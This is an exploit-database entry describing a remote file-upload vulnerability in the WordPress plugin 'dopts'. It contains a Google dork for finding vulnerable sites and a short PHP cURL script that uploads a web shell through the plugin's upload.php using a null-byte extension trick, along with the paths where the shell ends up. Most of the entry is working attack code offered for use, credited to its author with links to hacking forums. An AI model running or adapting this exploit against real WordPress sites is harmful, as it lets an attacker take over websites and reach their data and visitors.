Wordpress plugins dopts upload File Vulnerability

2017.05.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # Exploit Title: Wordpress plugins dopts upload File Vulnerability # Author : sohaip-hackerDZ # Google Dork : inurl:/wp-content/plugins/dopts/ # Tested on : Linux # data : 2017-05-24 # Blog : http://www.tools-hack.com/ ################################################################################# # # # if msg : erorr # # [!] Exploit : 127.0.0.1/path/wp-content/plugins/dopts/libraries/php/upload.php # # [!] File Location : http:/127.0.0.1/path/wp-content/uploads/SHELL.php%205jpg # # [*] OR http:/127.0.0.1/path/wp-content/plugins/dopts/uploads/SHELL.php%205jpg # # # # # # [!] Exploit : ################################################################################## <?php $postData = array(); $postData['file'] = "@shell.php%2500jpg"; $sohaip = curl_init(); curl_setopt($sohaip, CURLOPT_URL, "http:/[target].com/wp-content/plugins/dopts/libraries/php/upload.php"); curl_setopt($sohaip, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0"); curl_setopt($sohaip, CURLOPT_POST, 1); curl_setopt($sohaip, CURLOPT_POSTFIELDS, $postData ); $dz = curl_exec ($sohaip); curl_close($sohaip); unset($sohaip); echo $dz; ?> ################################################################################# # ABOUT # Facebook : https://www.facebook.com/sohaipbarika # forum : http://spyhackerz.com/forum/ # Blog : http://www.tools-hack.com/ #################################################################################

References:

http://www.tools-hack.com/2017/05/exploit-rce-wordpress-shell-upload-2018.html


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top